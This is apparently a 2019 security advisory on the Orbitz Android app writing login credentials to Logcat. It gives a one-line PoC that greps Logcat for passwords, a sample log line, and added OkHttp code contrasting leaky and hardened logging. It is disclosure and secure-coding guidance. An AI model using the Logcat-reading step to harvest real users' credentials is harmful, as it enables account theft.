friendlyjlee

Security Bug in Orbitz Android App

Sep 16th, 2019
# Exploit Title: Orbitz Android App - Username/Password Logging
# Application: Orbitz
# Version: 19.31.1
# Software Link: https://play.google.com/store/apps/details?id=com.orbitz
# Company: Orbitz
# Installs: 1,000,000+
# Impact: By reading Logcat output, an attacker can obtain Orbitz usernames and passwords
# Category: Mobile Apps
# Tested on: Android 9

---Description---
Usernames and passwords are written to the log during authentication, so an attacker can obtain an Orbitz user's ID and password simply by reading Logcat. This matters most on old Android versions prior to Jelly Bean, where any installed app could read Logcat without any permission.

---Vendor feedback---
After the report, the vendor quickly fixed this problem and released a new version.

---PoC---
1. Try to log in with Orbitz, entering a username and password

2. Search for the password in Logcat
$ adb logcat | grep 'password'
08-06 18:31:28.036 6213 6294 D OkHttp : email=myOrbizemail%40gmail.com&password=myOrbitPassword&staySignedIn=true&siteid=70201&langid=1033&sourceType=mobileapp&clientid=orbitz.app.android.phone%3A19.31.1

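The "OkHttp" tag and the raw form body in the log line above are what OkHttp's HttpLoggingInterceptor emits at Level.BODY; that this is the logger the app used is an assumption, since the advisory does not name it. The following is an added illustration, not code from the advisory or from Orbitz, written against the OkHttp 4.x Kotlin API: the leaky configuration beside a hardened one, with `isDebugBuild` standing in for `BuildConfig.DEBUG`.

```kotlin
import okhttp3.Interceptor
import okhttp3.OkHttpClient
import okhttp3.Response
import okhttp3.logging.HttpLoggingInterceptor

// Leaky setup (assumed cause of the log line above): Level.BODY echoes every
// request body, including the login form, to Logcat under the "OkHttp" tag.
fun leakyClient(): OkHttpClient {
    val logging = HttpLoggingInterceptor().apply {
        level = HttpLoggingInterceptor.Level.BODY
    }
    return OkHttpClient.Builder().addInterceptor(logging).build()
}

// Release-build logger: method and URL only, with the query string dropped so
// that credentials passed as query parameters never reach Logcat either.
class RequestLineLogger : Interceptor {
    override fun intercept(chain: Interceptor.Chain): Response {
        val request = chain.request()
        val urlWithoutQuery = request.url.newBuilder().query(null).build()
        android.util.Log.d("Net", "${request.method} $urlWithoutQuery")
        return chain.proceed(request)
    }
}

// Hardened setup: bodies are never logged, even in debug builds, and the
// headers that carry session material are redacted.
fun safeClient(isDebugBuild: Boolean): OkHttpClient {
    val builder = OkHttpClient.Builder()
    if (isDebugBuild) {
        builder.addInterceptor(HttpLoggingInterceptor().apply {
            level = HttpLoggingInterceptor.Level.HEADERS // not BODY: bodies carry credentials
            redactHeader("Authorization")
            redactHeader("Cookie")
            redactHeader("Set-Cookie")
        })
    } else {
        builder.addInterceptor(RequestLineLogger())
    }
    return builder.build()
}
```

With `safeClient`, the `adb logcat | grep 'password'` check from the PoC returns nothing for a login request, which is the test a reviewer should run before release.
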
---Reporter---
Jaeho Lee (Jaeho.Lee@rice.edu)
Rice Computer Security Lab
Rice University